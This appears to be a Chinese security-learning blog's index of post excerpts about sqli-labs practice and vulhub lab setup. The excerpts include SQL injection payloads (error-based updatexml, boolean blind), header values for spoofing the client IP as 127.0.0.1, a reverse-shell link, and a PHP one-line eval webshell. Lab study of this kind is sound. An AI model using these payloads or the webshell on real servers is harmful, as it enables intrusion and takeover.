weixin_44574152的博客

原创 sqli-18

1',1,updatexml(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security' )

转载 如何运行docker

kali下vulhub的使用今天在kali上搭建了vulhub环境，遇到了很多坑，没有写搭建环境的博客，不过都能百度解决。在此记录一下如何使用。1sudo service docker start 启动docker服务cd ls 命令进入目标文件下（本次实例：vulhub/activemq/cve-2016-3088/）运行命令：1docker-compose up -d （推荐）或者 docker-compose build ///编译环境启动容器PS: 为什么 docker-c

原创 2021-07-24

ERROR: for cve-2012-2122_mysql_1 Cannot start service mysql: driver failed programming external connectivity on endpoint cve-2012-2122_mysql_1 (c2d9c2a0f1302e0fb871448f5ac8ebfa0d1ab25157f0105c85ac12911d8bab1f): Error starting userland proxy: listen tcp 0.

转载 反弹shell

https://zhuanlan.zhihu.com/p/138393396

原创 web渗透后缀篇

.mdb在种类繁多的文件格式中，我们经常会看到后缀为mdb的数据文件。这种文件是微软的一种数据库文件，一般需要安装微软的office软件，如excle再使用office软件系列中的access数据库编辑软件才能打开此类文件。（xycms是一个用asp，access）...

转载 CMS和框架

文章为转发作为新手我一直不了解什么是CMS和框架的区别，刚好最近学习到了ThinkPHP，就找了这篇文章。很多人学了许久的PHP，但对于框架和CMS的认识比较模糊。这个其实很重要，应该全面而清晰的认识。1 . 各自代表框架代表：ThinkPHP（简称TP，以及它的最新版TP5），Laravel，YII，CI，…CMS：Content Management System：内容管理系统；代表有：PHPCMS,dedecms,phpMyWind,帝国CMS，Ecshop,ECMall,Discuz,PH

原创 抓包工具常见使用-ip伪造

x-forwarded-for: 127.0.0.1x-remote-IP: 127.0.0.1x-remote-ip: 127.0.0.1x-client-ip: 127.0.0.1x-client-IP: 127.0.0.1X-Real-IP: 127.0.0.1在数据包中加入这个就可以了，任选一种方式

原创 sqli中的一些PHP浅层个人理解

原创 基于表单的sql注入

前言:题目来源sqli-labs-master第10/11题

原创 if的sql盲注

前言：题目来源：sqli中的第八题，布尔盲注1.主要涉及到函数if(a,b,c) a是条件，满足返回b，不满足返回length() 长度判断2.布尔盲注 故名思意结合布尔判断 大家都应该知道这个?id=1 and 1=1 --+ 那么这个就不难理解?id=1 and if(a,b,c) --+ 接下来就是构造参数a 首先判断数据库长度?id=1 and if(length(database()),1,0) ?id=1 and...

原创 一句话木马

一句话木马前言：题目取自sqli-labs-master/Less-71.首先判断闭合，对于我这样的小白实在试不出来，我们可以用burpsuit爆破，也可以直接看源码，总之得到闭合’))2.联合注入不行，报错注入不行，于是根据题意哈哈然后就一句话木马吧3.一句话木马原理就是可以上传一个文件，然后得到服务器的控制权限4. a.木马写法<?php @eval("$_POST['key']")?>b.这是一个PHP代码，<?php 中间php代码 ?>

原创 sql注入基础篇——报错注入

前言：当联合注入受到限制的时候，可以利用数据库的报错机制，人为的创造错误，使得结果集出现在报出的错误中,下面结合sqli-labs-master/Less-5来演示。1.extractvalue()函数extractvalue(xml_document,Xpath_string)是以Xpath_string格式字符串对xml_document进行查询的函数 。xml_document xml：xml文档对象 要求是一个String类型。Xpath_string...